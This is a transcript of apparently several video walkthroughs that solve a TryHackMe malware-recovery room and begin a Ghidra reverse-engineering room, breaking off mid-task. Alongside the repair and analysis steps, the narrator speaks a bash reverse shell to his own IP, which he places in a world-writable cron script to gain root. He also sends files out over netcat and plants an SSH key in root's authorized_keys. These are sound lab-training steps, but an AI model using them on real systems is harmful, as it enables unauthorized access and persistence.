In this video, we are going to solve recovery machine on TryHackMe. So its description is not your conventional CTF. Okay, so we are just going to perform some malware analysis on this room. So our first task is help Alex. So first of all, we will start this machine because it will take approx 1 minute to launch this machine. So close this pop-up box and hi, it's me, your friend Alex. I'm not going to beat around the bush here. I need your help. As you know, I work company called Recovery Soft. I work on the website side of things and I set up Ubuntu server to run it. Yesterday, one of my work colleagues sent me the following email. Hi Alex, a recent security vulnerability has been discovered that affected the web server. Could you please run this binary on the server to implement a fix? Attached was a Linux binary called fixutil. As instructed, I ran the binary and all was good. But this morning, I tried to log into the server via SSH and I received this message. You didn't say the magic word. Okay, so it turns out that Tio got this mail account hacked and fixutil was the targeted malware binary specifically built to destroy the web server. When I open the website in the browser, I get some crazy nonsense. The web server files had been encrypted before you ask. I don't have any other backups of the web server. I know, horrible practice, etc. I don't want to tell my boss, he will fire me for sure. Please access the web server and repair all the damage caused by fixutil. You can find the binary in my home directory. Here are my SSH credential. So username is Alex and password is Medline. So we have credential, we can easily get a SSH access. I have set up a control panel to track your progress on port 1337. Access it via your web browser. As you repair the damage, you can refresh the page to receive those flags. I know you love hoardings. Good luck, your friend Alex. Okay, so we have credentials as well as they have explained that we can access this server on port 1337 to get the flags. So we have to find flag 0, flag 1, flag 2, flag 3, flag 4 and flag 5. So there are totally 6 flags and flag 4 and flag 5 contains some points. So our machine is launched. Let's copy this IP and try to access it in new tab. So first of all, we will need to connect to the OpenVPN. So just start your terminator and to extend this window, you can use Windows up arrow command. To split this window, you can use Ctrl Shift E. To split it again, you can use Ctrl Shift O. To log in as a root user, use command sudo -i. Default password for Kali is Kali. So just locate the location where we have downloaded our OpenVPN file. So I have downloaded it in cd/home/kali/desktop/tryhackme, and after release you can see here is our OpenVPN file decryptor.ovpn. To connect to the OpenVPN, let's use command openvpn decryptor.ovpn and hit the enter button. Now you can see we are successfully connected to the OpenVPN. It is showing initialization sequence completed. Let's try to ping to that IP. Here you can see we are successfully able to access that IP. And let's try to check open port of that machine. So telnet IP of that machine and port number 8 is. So it is showing escape character is J. So means port number 8 is open on that system. So click on exit to exit from this. We will try to check port number 1337 is open or not. So you can use command telnet then IP then port number 1337, and here you can see it is not showing any error, means port 1337 is open. Let's try to access that server in web browser. So first of all I will paste the IP, and here you can see front page is encrypted and we are not able to see anything here. So we will need to decrypt this. I will just duplicate this tab and let's try to access port 1337. So use :1337 and just wait for some time. It will take some time to load this page, so just have some patience. Okay, the page is loaded now. It is showing help Alex. Each time you remove part of the malware and press refresh button, you will get a flag. Okay, so whenever we are going to uh, remove any malware's part, so we will get a flag by clicking on refresh button. So we have credential, username Alex, password is Medline. So let's try to connect to that machine via SSH. clear the screen by Ctrl L, and let's try to check open port 22. So 22 port is for SSH. Here you can see port is open. We can easily get access of this 22 port. So use Ctrl L to clear the screen. Then use SSH. Then username is Alex @IP. Default port of SSH is 22. If you want to specify another port, then you can use -p. So here click yes, and then password of Alex. So it is a maid line. So just enter that password and hit the enter button. Here you can see it is continuously printing this. You didn't say the magic word. So we are not able to access this machine by using Ctrl C or anything. So we will need to find alternative method to access this machine via SSH. So for that, use Ctrl L to clear the screen, and we are going to use /bin/sh. So it is a location of a shell. So just we are going to access shell path /bin/sh after SSH command. You can also use /bin/bash. So I am going to use here bin/sh and hit the enter button. After that, enter the password of Alex. So it is a maid line, and hit the enter button. Here you can see we have successfully logged into that machine. So after ls, you can see we are able to see the files. To make this interactive, you can use /bin/sh-i. So it will get interactive mode. Here you can see we are seeing dollar in front of this. We are in interactive mode. Now after ls, you can see there is one folder called fixutil. Let's try to find hidden files into this. To check hidden files, you can use ls-a. So there are plenty of hidden files called bash logout, bash rc. Let's analyze all files one by one. So first of all, we will analyze bash logout file by using cat bash_logout. Sorry, it should be .bash_logout. So use cat .bash_logout and hit the enter button. So after analyzing this file, it doesn't seems critical or any suspected item here. So I will just analyze bash rc file now. So use command cat .bash rc, and in the end of this file you can see there is one while loop, and it is continuously printing. You didn't say the magic word. Okay, so this file is infected. We need to solve this issue. To resolve this issue, we will just rename this file. So to rename this file, you can use mv command. mv is used for moving or removing the file. So I will just move this file with another name. So use command mv.bash rc and give any file name to this. So I will just make it .bash rc .bk. Okay, after ls, you can see that file is renamed to bashrc.bk. Now you can just exit from this and try to take SSH session without /bin/sh. Again exit and try to take SSH session. So use SSH Alex @IP and hit the enter button. Password is maidline, so enter that password, and you can see we are successfully able to access that Alex account. Now just edit .bashrc file by using vim. So use vim.bashrc.bk. To shift to last line, you can use shift G. So we are in last line. To insert into this, use I button and remove last line. Remove everything. Okay, it automatically get terminated. So let's open that file again. I will use vim.bashrc.bk and hit the enter button. So use here E to edit it anyway. Click on enter to continue. Use I to insert and remove everything by delete. To save this file, you can use escape, then :W for write, Q for quit. So we have successfully edited this file. Let's rename it to bashrc again. So I will just move this bashrc.bk to .bashrc. Now exit from this window. So here you can see we have successfully renamed this. Now exit from this account and let's try to access it again. Password is maidline and hit the enter button. So here you can see it is in green color now. We have successfully make the necessary changes. So let's try to refresh this page again on port number 1337, and here you can see we successfully got our flag 0. So just copy our flag 0, which is starting with THM and ending with close curly bracket. So copy everything into this by Ctrl C, open TryHackMe and paste it into flag 0. Click on submit and done. We are done with this. Now we need to find flag 1. So to find a flag 1, we are just going to analyze background processes onto that system. So by analyzing background processes, we will get idea about which processes are running in background which are suspicious. So I am going to create or enter into folder called recovery. So you can see there is one file called pspy. You can also download it from GitHub. So just download this file and we need to upload it on our target machine. So I will just create one simple HTTP server using Python on our system. So just enter command python then -m and simple HTTP server -m simple HTTP server, and therefore specify the port number. So I will use here port number as a 8080 and hit the enter button. Now we have successfully set up the simple HTTP server on recovery folder. You can check our IP by IPA command. Here you can see our IP is 10.9.10.208. Let's try to log in as Alex again. So use command ssh alex@IP. Password is medline. We need to download that pspy file on our local machine. So use command wget, then IP of our local machine is 10.9.10.208 and port number we are using is 8080. Okay, it is automatically terminating us from this. I think few background processes are closing our session, so we will just need to analyze those process. Let's copy this wget command again. Try to ssh alex, hit the enter button. Password is medline. Paste that wget command, then /pspy. So we have successfully downloaded this pspy. After downloading this pspy file, you need to make it executable. So to give it a executable permission, you need to use command chmod plus x for executable and our file name. So here is our file pspy. Use command chmod plus x pspy, and we have successfully set up executable permission. Now open this file by ./pspy. It will analyze background running processes, so we can easily find any suspicious process running behind. So you can just close this tab by Ctrl Shift W. Analyze all processes, like few processes are running on UID 0, few processes are running on UID 1000. Okay, so it is running .bash, httpd, then bin sh, user has been cron sshd. Okay, so this is not looking any suspicious process, so just wait for some time more. Okay, it is taking too much time to analyze this file, so just have some patience and wait for some time. Now here you can see there is one file called bin.sh, and thereafter it is running one shell scripting in /opt brilliant_script.sh. Okay, so it is looking suspicious. So this is a shell script. So I will just exit from this pspy by using Ctrl C, and let's try to open this opt brilliant script. So use cat/opt/brilliant script, and here you can see it is killing our session. Okay, so we will just comment it out by using vim/opt/brilliant.sh and use I to insert and add hash to comment the for loop into this. We have successfully commented this. To save this, use escape:\wq. Now use cat/opt/brilliant_script.sh, and we have successfully commented this. Now this will not come terminate our session. open port 1337 again, and here you can see we have successfully got the flag 1. So copy this flag 1 by Ctrl C, open TryHackMe and paste it into flag 1. Click on submit and our answer is correct. Now we need to find flag 2. Okay, to find a flag 2 we need to perform some reverse engineering step. So first of all I will open Terminator again and let's analyze all files. So here I will use ls. So there is one file called fixutil. Let's try to display content of this by using cat fixutil, and here you can see we are not able to read anything into this. So we are going to use GHydra to perform reverse engineering and learn and find how it is working in behind. So for that we will simply turn off our Python simple HTTP server and we will download this on our local machine. So use Ctrl C to terminate our Python server. To download this on our local system we will use here netcat. So use nc hyphen lvp or nlvp, then specify the port number which you want to listen on, and we need to download this. So use greater than and give any output file name. So I will giving here fixutil.bk and hit the enter button. Now we need to send it from netcat on this machine. So first of all I will just split this key and find the IP by IPA command. So our IP is 10.9.10.208. so on target machine use command ls-la. So this is our bash fixutil file. Now we need to send this. So I will use nc, then our machine's IP. So our local machine IP is 10.9.10.208. so just specify that IP space specify the port number. So port number which we are listening on is 4444. So just specify that port number. Then file name. So it is a fixutil. Okay, so we are using here less than symbol, and here you can see on our local machine it is showing connect to, and we have successfully downloaded this file. So you can just use Ctrl C and use ls-a la, and here you can see file size is 37344. Here also file size is 37344, means we have successfully downloaded this file. Now we need to open GHydra. To open GHydra you can use command like GHydra and just wait for some time until Hydra gets loaded. Okay, Hydra is loading now. It is just a tip of the day. You can just close this tab. So you will get multiple tips into this. I will just close this. Here you can see we haven't created any active project. So we need to create a project. Without project we cannot import our fixutil file. Here you can see we are not able to import the file. So to create a new project, click on file, create a new project, select non-shared project, then next choose a directory where you want to create the folder, sorry, project. So I'm just going to create it in Kali home Kali, then recovery folder, and give any name to this project. So I will just give it here our machine name. So it is a recovery machine on Hack the Box. Click on finish. We have successfully created the full project. Now we need to import our file. So just go to file, import file, and it is in home Kali recovery, and here is our fixutil.bk file. So simply select that file. It is importing our file, so just wait for some time until it gets imported. Click on OK. So it is just loading a language. Okay, our file is loaded now. It is again importing and processing. Okay, so just scroll down below. I will just minimize this, import result summary, and click on OK. Click on OK button. After that select the file and click on drag on button. So it will start syncing our file and load all its functions. So just have some patience. Okay, it is loading our file now. It is showing nothing. Okay, sometimes it doesn't show anything, so you just need to close this file and open it again. So just wait for some time. If it doesn't show anything, you need to just close this and open it again. I will just try to find any alternative method for this. Okay, so nothing is there, we just need to close this. So click on close button and double click on fixutil.bk file again, and it's now loading. Okay, so click on yes. Now it is asking to analyze this, so click on analyze. It started analyzing our file. We are just going to check main function of this, so just extend the functions folder and find main file, so which will contain information about this file, like what steps it is performing. So simply click on main, and in right side you can see it is loading its functions. Like after loading this file, it is opening home/alex.bashrc, then it is printing while loop, like you don't say the magic word in home alex bashrc file. Okay, thereafter it is copying lib x86 by 64 linux gnu liblogging.so file to temp logging.so. Okay, thereafter it is opening x86 64 linux gnu liblogging.so, and therefore it is printing pond in /bin/admin. Okay, so as we know, this is copying liblogging.so to logging.so. So we just need to analyze this liblogging.so file on our target machine. Let's open Terminator again and change the directory into /lib/x86 underscore 64 linux gnu and use ls. So there will be liblogging.so file. We will just need to upload this on our system to analyze it on GHydra. So I will start netcat listener on our machine again and give any name to this output file. So I'm just giving here liblogging.so.bk and hit the enter button. Now upload liblogging.so from victim's machine. So here also we are going to use nc command. Then the file name is liblogging.so. So just remove that fix and instead of that make it liblogging.so. So our IP is 10.9.10.208 and port number is 4444. Copy liblogging.so and paste it here by Ctrl Shift V, hit the enter button, and here you can see we have successfully uploaded this on our local machine. You can use Ctrl C to exit from this. After ls you can see we have successfully downloaded this liblogging.so. Now open GHydra again, go to file, then import a file and open liblogging.so.bk and select the file to import this. Click on OK and again click on OK. Try to open this liblogging.so by double clicking on this. So it is loaded successfully. Click on yes, click on analyze. Okay, we need to find logging or main function into this, so just extend the function. So I don't think so it contains any main file, so we will just try to find files which have some login errors or anything else. Okay, there are plenty of folders, you can just go through all folders one by one. So there is one file called logging incorrect, so I will just open that and extend this window. So what it is doing, it is moving temporary logging.so to old liblogging.so. Okay, so it is just moving this temporary logging to old liblogging, and there are also thereafter it is opening a .ssh authorized key and adding a new authorized key. So I think this authorized key of a attacker, we will need to remove this authorized key in future video, so just stay tuned. After that, it is adding a new user called security with uid 0, means it will have root privileges. And after that, it is printing something like security, then its encrypted password in slash user has been ch password. After that, it is running files opt brilliant script.sh. Okay, so we know what attacker is doing in this. So first of all, we will just move this old liblogging.so to liblogging.so to resolve this issue, because in previous video we already saw that attacker was moving liblogging.so to temporary logging.so, and now it is moving temporary logging.so to old liblogging.so. So I will just try to move old liblogging.so to liblogging.so and hit the enter button. So it is showing that permission denied. We don't have permission to run this file because we are logging as Alex. To move this, we need to log in as a root. So we need to perform privilege escalation. For performing privilege escalation, let's open home directory of this Alex user. So use cd, and here you can see. So just go to cd slash opt, use ls-la, and here you can see brilliantscript.sh having root privileges, and all user group and others having read write execute permission to this brilliantscript.sh, means we can easily make the changes into this and perform privilege escalation, like we will be able to access root user by running this command. And we already know brilliantscript.sh is continuously running behind, so we will just set up a netcat listener on our system by using nc hyphen enlvp and specify any port. So I will just specify here double eight port. Now on victim machine, open brilliantscript.sh by command vim brilliantscript.sh. I will just remove this for loop line. So keep the first line as it is, /bin/bash, hit the enter button. Now we will get a back access of root user. So for that you can use bash hyphen I, therefore greater than and slash dev slash tcp slash, we need to find our IP. So our IP is 10.9.10.208. Thereafter we need to specify port number. For a privilege escalation method, you can just refer Google to get more help about uh, performing privilege escalation steps. Therefore use 0 greater than and space 1 and hit the enter button. You can save this by escape colon wq. So it will automatically get executed after 1 minute. So just wait for some time until brilliantscript.sh get executed. And here you can see we successfully got this root access of recovery server. Now we are going to move old liblogging.so to liblogging.so. So just use ls. So there is one initscript.sh, and first of all we will change our directory to /lib/x86_64 gnu. So just okay, so use cd and copy this folder, paste it by Ctrl Shift V. So here is our file onlyblogging.so. So just copy this, use command mv, then paste onlyblogging.so, and we are going to rename it to liblogging.so and hit the enter button. After ls, you will be able to see we have successfully renamed that old liblogging.so to liblogging.so. Now open port 1337 and try to refresh this page. And here you can see we have successfully captured the flag 2. So copy this flag 2 by Ctrl C, open TryHackMe again and paste that flag in flag 2, click on submit and done. We have successfully solved this flag 0, flag 1 and flag 2. In this video we are going to find flag 3, flag 4 and flag 5 of this recovery machine on TryHackMe. So for that let's analyze GHydra and this is a fixutil.bk file. So it was copying liblogging.so to logging.so. Okay, so we have already moved this file. Now analyze liblogging.so.bk file. So after moving logging.so to old liblogging.so, what it was doing, it was just uh, opening the authorized key in slash root slash dot ssh in authorized key and adding attackers SSH authorization key. Means attacker was able to access this machine without any password because of this authorization key. Now we need to remove this. So to remove this, you can just open a terminal and just open this file root.ssh and authorized key. So I will just change the directory by using cd. So authorized key is in slash root. So after ls hyphen a, you can see there is one folder called .ssh. So we will just change the directory to .ssh, and after ls you can see there is one file called authorized keys. So you can just rename this or remove this. So I will just use rm authorized underscore keys, and after ls you can see there will be no file. So here you can see there is no file. Now open TryHackMe again and refresh on port 1337. So here is our flag 3. You can just copy this flag 3 by Ctrl C, open TryHackMe and paste it into flag 3. Click on submit and our answer is correct. Now we need to find flag 4 which have 25 plus points. So to find the flag 4, let's open Terminator again, and I will just try to get root access of this without any privilege escalation steps. So for that I will just add my SSH key into this. So to add my SSH key, we need to generate our SSH key. So for that, open a new terminal and use command ssh-keygen to generate our SSH key. After that, you can just specify any file name here. Like I'm giving here file name called recovery and hit the enter button. You can specify any password here to access this file. So I'm not entering any password here, so just hit the enter button double, and after ls you can see there is one file recovery.pub and recovery. So we will just open that recovery.pub file by using Sublime Text Editor. So use sublm space recovery.pub, and here is our SSH key. So you can just copy this SSH key, select everything by Ctrl A, copy this by Ctrl C, and our target machine we need to paste this. So to paste this you can use echo command, then double inverted comma, paste our key by Ctrl Shift V, then close that double inverted comma, then use greater than sign and make a file called authorized. Don't make any spelling mistake here, so I will make it here authorized underscore keys and hit the enter button. So we have successfully authorized our local machine on our victim's machine. We will be able to access root account without any password. Let's try to access that. So let's try to take SSH access of that root user by using command SSH hyphen I, then specify our recovery file. So use recovery, then username is root @ and paste the IP here. Sorry, I mistakenly paste the key here. So use ssh hyphen I, then our keygen is recovery, then username is root @ IP of our target machine is 10.10.4.114. So just copy this IP and paste it here by Ctrl Shift V, hit the enter button. Here you can see we are into root user without any password. So this is how you can perform privilege escalation into this machine. Now we need to find flag 4. So for that we will analyze GHydra again. So just open GHydra and analyze that liblogging.so file again. So after SSH, what it was doing, it was adding a user. So that user was security. So we just need to remove the security user to find a flag. So open terminal again and try to remove that user. So to remove the user you can use command called user_del and security. So it is showing that the user is currently used by process 1, so we cannot delete this. So we need to perform another step. So we already know the user are stored in /etc/passwd. So we will just display content of etc/passwd or edit the content of this. To extend this window, you can use Ctrl Shift X. Now use command cat/etc/passwd, and here you can see in the last line there is user called security. We need to remove this. So just edit this etc/passwd file by using vim command. So use vim/etc/passwd. Shift to last line by using Shift G. Thereafter use I to insert into this and delete the last line. To save this, you can use escape:_wq. Okay, we have successfully removed this. Now we need to remove its password too. So all passwords are stored in /etc/shadow. So to remove the password, we need to edit /etc/shadow file. So use vim/etc/shadow. Use Shift G to switch to last line. Use I to insert into this. Remove the last line. Remove everything of that security user. And to save this, use escape:_wq. Hit the enter button. We have successfully made the necessary changes. Now open port 1337 again and try to refresh the page. Here you can see we successfully got the flag 4. You can just copy this flag 4 by using Ctrl C. Open TryHackMe and paste it into flag 4. Click on submit and we are done. Now we need to find a flag 5. So for that, let's open GHydra again and analyze that file more. So just open that. After adding a security user, what it was doing, so it was printing this security user in /sbin/ch password. Thereafter it was opening brilliantscript.sh and adding line called bin.sh and for loop. Thereafter it is opening /etc/crondy/evil. So we will just need to analyze this crondy.evil file, and after that it is writing in brilliantscript.sh. Okay, at the last line you can see it is changing permission for etc/crondy/evil. So there may be some, we will find some hint into this crondy.evil file. So let's try to analyze this. Open Terminator and use command cat/etc/crondy/evil and hit the enter button. Okay, so it is just printing something in test log. Let's try to analyze this test log file. So use command cat/tmp/testlog. Okay, nothing is there. So let's try to move to /opt folder where brilliantscript.sh file were present. So I will just use command cd/opt to change our directory to brilliantscript.sh. So here is nothing. So just move there. Use ls-a to list all the files. And there is one hidden directory called fixutil. So I will just use command cd.fixutil. Use ls, and there is one backup.txt. So I will just display its contents by cat backup.txt. Okay, so I think it is a decryption key. So we know our site is encrypted. So by using this, we can easily decrypt this. Let's try to find this backup.txt. Okay, this is not present on liblogging.so file. Okay, so nothing is there. Let's try to open web browser again, and we are going to decrypt our index.html and all other file. So for that we are just going to use here cybershape file site. So just search for cybershape on Google. You will get first GitHub link. So you just need to open that gchq.github.io/cybershape. So just open this, and we need to find index.html files location on our victim's machine. So here you can see it is in encrypted format. So open terminal again, and to find index.html you can use command find. So just copy our decryption key first, open Sublime Text Editor and store it somewhere by Ctrl V. Okay, let's try to find index.html by using find, then use uh, hyphen name, sorry, slash is a parent directory. It will find in all files in between parent directory, then hyphen name, so name should be index.html, hyphen type should be file to slash dev slash null, and hit the enter button. Now you can see index.html is in slash user slash local slash apache2 slash htdocs slash index.html. So I will just copy this location, use cd, then paste that by Ctrl Shift V, use ls, and here you can see there are totally three files: index.html, really important txt, and to.html, and all of the files are encrypted. You can just use cat index.html, and here you can see this file is encrypted. We need to decrypt this to recover our site. So first of all, I will just zip this file and upload it on our local machine. To make a zip, you can use command like tar hyphen cvs cvf c for compress, v for verbose, and f for forcefully. So I will just store this in the name of site.tar. I will use tar to compress all the files. After ls, you can see there is site.tar. We need to upload this on our local machine. So I will just uh, exit from this so I will just use Ctrl Shift Z, then use nc 10.9.10.208. It is our local machine IP. Port number is 8888. Then site.tar. We are going to upload this on our local machine. So to exit from this, use Ctrl Shift Z and our local machine. I will just exit from this Alex user by Ctrl D or exit. Set up a netcat listener. So I will just make a directory called site, then cd site, and set up a netcat listener into this site folder. So use nc hyphen nlvp, and port number is 8888, and file we are going to download is site.tar, and hit the enter button. Hit the enter button on our target machine, and here you can see we have successfully downloaded this site.tar file. So use Ctrl C to exit from this. Use ls-la. So our file size is 10240. So use here also ls-a, and it is also of 10240. Now we need to decompress this. So to decompress this, you can use tar -xvf, then site.tar command to decompress this. So just use that command, tar -xvf site.tar, and hit the enter button. After this, you can see we have successfully decrypted all the encrypted files. So first of all, I will just copy this encryption key, open a web browser where we have open CyberShape, and encryption type is looking like a XOR. So I will just copy XOR into recipe and paste our key into key. So just paste that decryption key into recipe. Okay, now we need to import our index.html file. So click on open file as a input and choose our index.html file. So it is in slash kali recovery site. So open this and just click on bake. So it is not showing nothing in output. I think there is some mistake. So again click on bake. Okay, it is also showing error. Okay, so I was choosing here hex, so make it utf-8 and try to bake it again. And here you can see we have successfully decrypted index.html file. So you can just copy this from copy to clipboard option. Uh, Extend this window by Ctrl Shift X, use Ctrl L to clear the screen. Just empty the index.html file by using echo single inverted comma, then greater than index.html. So it will nullify our index.html. It will remove everything from this. Now edit this file by using vim index.html. Use I to insert into this, then use Ctrl Shift V to paste our clipboard, then exit from this by escape :wq. After ls, there is our index.html file. Now nullify really important.txt file. So use echo single inverted comma greater than and really important.txt. Hit the enter button. Let's try to edit really important.txt by using vim. Open web browser again, and here choose really important.txt file. Click on open. Now choose really important.txt, click on bake, and here is our output. So just copy this output, Open terminal again, use I to insert into this, use Ctrl Shift V, then use escape colon W key to save this. Now nullify todo.html by using echo single inverted comma greater than todo.html. Edit this by vim todo.html. Open web browser again and select todo.html by open files as the input. Click on open, select todo.html, click on bake, and here is our output. So just copy this output, open terminal, then use Ctrl Shift V to paste, then escape colon W key to save. So we have successfully make the changes. Try to access our target machine. So it is on 10.10.4.114. So I will just refresh this page, and here you can see it is loading recovery soft page. Means we have successfully recovered this site. And now open help Alex page. Click on refresh, and we have successfully found the flag file, and we have solved this challenge. So you can just copy this flag file. We have successfully recovered this recovery machine. Now paste it into flag file and submit. So this is how you can solve recovery machine challenge on TryHackMe. In this video we are going to solve basic malware reverse engineering room on TryHackMe. So this room aims towards helping everyone learn about the basics of malware reverse engineering. So in this video we are going to learn how you can reverse engineer malwares using GHydra. So I will just scroll down below. So here is our task 1, introduction about this room. So these challenges are aimed towards learning about the static analysis technique used to analyze the malware. The main aim for this room is not to use any types of debuggers. Neither the executable program should be run on any platforms. You are required to answer all the questions without even using the debugger and even not executing the executable programs. Meanwhile, all credit goes to Malware Tech blog for creating these awesome challenges. Note, if you have already solved this challenge, give it a try again while giving enough time to newbies who want to learn about malware analysis. Also, don't try to copy paste stuff from other blogs or walkthroughs as it won't lead you to learn this amazing field. If you are having a hard time solving these challenges, study more about it and the techniques which are involved. Meanwhile, you can also join TryHackMe Discord and fire up your problem in there. So password for the zip is malware tech. So we will need this password for future references. So you can just copy paste it somewhere. Now in this tool we are just going to use GHydra. So first question is read the above. We have read the above. So simply click on completed, and we have successfully solved this task 1. Now minimize the task 1 and let's move ahead to task 2. So task 2 is a strings challenge 1. I will expand this. Okay, so this executable prints an MD5 hash on the screen when executed. Can you grab the exact flag? Note, you don't need to run the executable. Okay, so it is printing a MD5 hash, and we need to find which MD5 hash it is printing on the screen when anyone install this on their uh, system. So first of all, we need to download this file, and simply click on download as file blue button. Thereafter select save file, click on OK. Okay, so it is downloaded now. We need to analyze this. Now first question is, what is the flag of which that MD5 gets generated? Okay, so we just need to find a flag which this MD5 is generating. So I will simply click on downloads and open that folder where we have downloaded string1.zip. Now we need to extract this. So I will simply right click on this, click on extract here, paste the password which we copied before by Ctrl V. So it is like malware tech. Click on OK, and here is our string1.exe file. So it is a Windows executable file. We need to analyze this. To analyze this, we just need to use GHydra. For that, I am opening Terminator first. To open GHydra, you can use command called GHydra here. So use here GHydra to open GHydra tool. It is just a graphical version of our Hydra tool. That's why it is calling graphical Hydra, means GHydra. So it will take some time to launch the GHydra. So I am just fast forwarding this window. Now this tool is showing tip of the day. You can just close it. If you want to learn more, you can just click on next. Now you can see if I try to import that exe file, it is not showing to import that file. So first of all, we need to create a active project. So to create a project, click on file, then new project, then select here non-standard project, click on next button. Thereafter it is asking that project directory, so we just need to create a project directory. So what I will do, I will just change the directory to desktop, and there I will create a new folder called malrev, means malware reverse engineering. So just use command mkdir and give the folder name and hit the enter button to create our folder malrev. Now open ghidra again, click on project directory, triple dots, go to desktop. So here is our malware folder. Click on select project directory, then you need to enter project name. You can enter any name here, so I am just entering here malware reverse engineering. You can specify any name like as you want. And thereafter click on finish. So we have successfully created a project. Now we can import our exe file. So to import our exe file to analyze, just go to file, then import file. So here is our string1.exe file. So just select this file, click on select file to import. This will start importing our file. So just wait for some time until it gets imported. So it is showing, it is automatically detected is file format. So it is a portable executable file which is in which have language x86 Windows. Okay. So destination folder where it will save its logs in malware reverse engineering folder which is recently created, and our program name is string1.exe. Okay, so it is loading our language and our file is successfully imported. So we just need to analyze this. So you can select that file and double click on that. So it is showing import result summary. You can just minimize this on and click on OK. Okay, so here is our string1.exe. You can simply double click on this or select this and click on this dragon icon. It is a code browser. So I will just double click here and our file is now loading to analyze. So just wait for some time until it gets loaded. After that it will show its function and all other source code. So you can just analyze those source code to find more information about this malware. Okay, it is taking some time. Okay, our file is loaded now. Now it is asking that your file has been analyzed, would you like to analyze it now? Okay, so we need to analyze it. I will click on yes. Now you need to select analyzer name. So there are plenty of analyzer names. I'm just going to keep it default and click on analyze button. Okay, it has started analyzing our file. You can see it in bottom right corner. So it is showing progress of this analyzation. So just wait until everything gets analyzed, and we need to find a main function where we get proper information about this malware. So to find main function, you just need to extend functions folder here. So function folder contains main file. Okay, so it is still analyzing the all the files and loading files and their subdirectories. So just wait for some time. Okay, it is loading children of the those functions. Okay, it is loaded now. There are plenty of functions and I am not able to find main function. Okay, so if there is no main function, still there is one file called entry. So entry should contain information about when this what happens when this malware get executed. So you can just analyze that into the entry file. So I'm just going to enter on entry file. So what it is doing, okay, so there is one lp text. Okay, so there is one undefined variable entry void, and there is one lp text md5 hash, and it is printing ptr yes underscore flag. Can I make it anymore? Okay, so I'm just going to select this flag starting from ptr until this round bracket. So just select that and we are going to copy paste this into TryHackMe. Copy it till round bracket. Okay, open TryHackMe, paste it into answer format by Control V, and thereafter I think I need to add this curly bracket, closing curly bracket. So I will simply, so in answer format you can see there should be only four character in front of open curly bracket. So I will remove that ptr from this. So just remove this, and at the end we need to add close curly bracket. Click on submit. Okay, so answer is not correct. I think there may be some changes. Hmm. Okay, we have selected this whole file. We have removed this ptrs. Let's try to add that again. I will add that ptrs and click on submit. Still it is showing wrong. I will remove that close curly bracket, submit. Still it is showing wrong. I will remove ptrs, submit. Still it is incorrect. So what is problem with this? Again open code browser again and analyze that. So does we get any hint or not? So there is one message box A which is also printing we have been compromised, and thereafter it is exiting this process and return 0. Okay, so I think I am making some mistake into pasting this flag. So what I can do, I think at the end there should be not numerical, like there are numericals called 00432294. I think if I try to remove those numericals, then we will get our answer. So I will simply open TryHackMe again and remove those numericals. So just open it. Okay, so I'm not adding a closing curly bracket. Click on submit and our answer is correct. So this was it. This is how you can solve challenge 1 on this machine. In previous video we solved the challenge 1 of this basic malware reverse engineering room. So in this video we are going to solve task 3 challenge 2nd on this room. So first of all I will download the task file. So simply click on download task file, blue button, click on save file and OK. So this will save this file in downloads folder. Now this executable prints an MD5 hash on the screen when executed. Can you grab the exact flag? Note, you don't need to run the executable. So this is also printing the MD5 hash on the screen when anyone trying to install this malware exe file. So we just need to find a flag for this. So what is the flag of which that the MD5 gets generated? So what I will do, I will simply open the downloads folder by clicking on downloads icon. Here is our string2.zip. We need to extract this. So for that we need a password. So I will just extend the task 1 introduction, copy the malware tech uh, password, open downloads, right click on string2.zip, then extract here, paste the password in password, click on OK, and here is our string2.exe. Now to analyze this we need to start a GHydra. So open Terminator to start a GHydra. Enter GHydra command to open graphical hydra. Okay, sorry, I make a spelling mistake. Add here GHydra and it will start loading the GHydra tool. So just wait for some time until our GHydra tool gets loaded. It will take some time to load the GHydra, so I am just fast forwarding this window. Now here is a tip of the day. Did you know the program tree allows your program to organize into hierarchical folders? Okay, so I don't want to read this tip, so I'm just simply going to click on close button to close this. Now we need to load string2.exe. We have already loaded string1.exe and created one project called malware reverse engineering. So go to file, click on import files and select the string2.exe file. So here is our string2.exe. Click on select file to open. Then it will start importing our string2.exe. So this will take some time. After that you can see it is automatically showing its format as a portable executable, then language as x86 Windows, destination folder and program name. So click on OK. This is loading language of this string2.exe file. Now the project has been imported. So it is showing import result summary. I'm just clicking on OK button. To open string2.exe, you can simply double click on this or select this and click on dragon button. So I have double click on this string2.exe and it is loading it in a Ghidra browser. So just wait for some time until our browser gets loaded. After that we need to analyze this file. So like previous video, we are going to analyze it function folder. Okay, it is a code browser. Now click on analyze. Yes, select the analyzer name and click on analyzer. So this is now started analyzing. You can see it in bottom right corner. Okay, so we are also going to find main function into functions folder. So I don't think so it also contains main function. So here also we are going to analyze enter function first. So just wait for some time until everything gets loaded. It is still loading children items of this function folder. Okay, there is one md5 hash file. So if I click there, so I don't think so, nothing is there. There is one comment. Click on OK into this. Okay, so there is one comment md5 hash at the rate. Okay, so this is not important thing. Click on entry again. So what it is doing, it is printing undefined variable, thereafter character 2c. So it is just taking local 2c's value as a character, and there are multiple undefined variables, so we don't need undefined variables. And at the last it is multiplying local 8 with the character. So here you can see it have added star. Star means multiply. Now below that there are plenty of values like local 2 having value f. So it is a plain text format, it is in plain text format. But after that you can see this value is in hexadecimal format, because you can see it is added for C, for B. So in hexadecimal the values are from 0 to 9, thereafter A, B, C, D, E up to F. So this is in hexadecimal format. If you want to learn more about this or decode this, we need to convert it to ASCII. At the end, for local 8, what it is doing, it is just using md5 hash and local 2c. So value of local 2c is f in plain text format. So I will simply analyze this with ASCII code. So for that, first of all, we need to copy this. So for that, I'm going to open Sublime Text Editor. So open Terminator and enter subl. So I have already one file here. I will simply close this recovery.pub file. I'm not going to save this. Remove everything from this. Copy paste these all values from local to B. Okay. So use Control C to copy. Open Sublime Text Editor, paste by Control V, and we need to remove all like a local underscore 2a is equal to and 0 into. So for that I am just going to find replace option in this Sublime Text Editor. I haven't used replace option into this, because if I try to do this manually it will take so much time. So let's try to find replace option. So in edit there is no option to replace. Okay, after using Control R, okay, it is used to find. Clicking on find, you can see there is a replace option which have shortcut Control H. So we can replace file using Control H. Now I am going to replace 0x is equal to 0x with empty string. So I'm not going to enter anything in replace and click on replace all button. Okay, we have successfully removed that 0x. Now I'm going to replace local. So just search for a semicolon and I have replaced all semicolons. Now search for local underscore and I'm just going to replace for first of all 2. So just enter here 2 and replace all the string which contains local 2a with empty string. Okay, so we have removed that. Again use Control H to replace local 1 and again click on replace all. Now again use Control H or just remove everything by manually. So I will just remove this local AF, local E, local D manually. It is taking too much time, so I will simply fast forward this window. Okay, so after removing everything, I'm just adding everything in one line, so it will be easy for us to 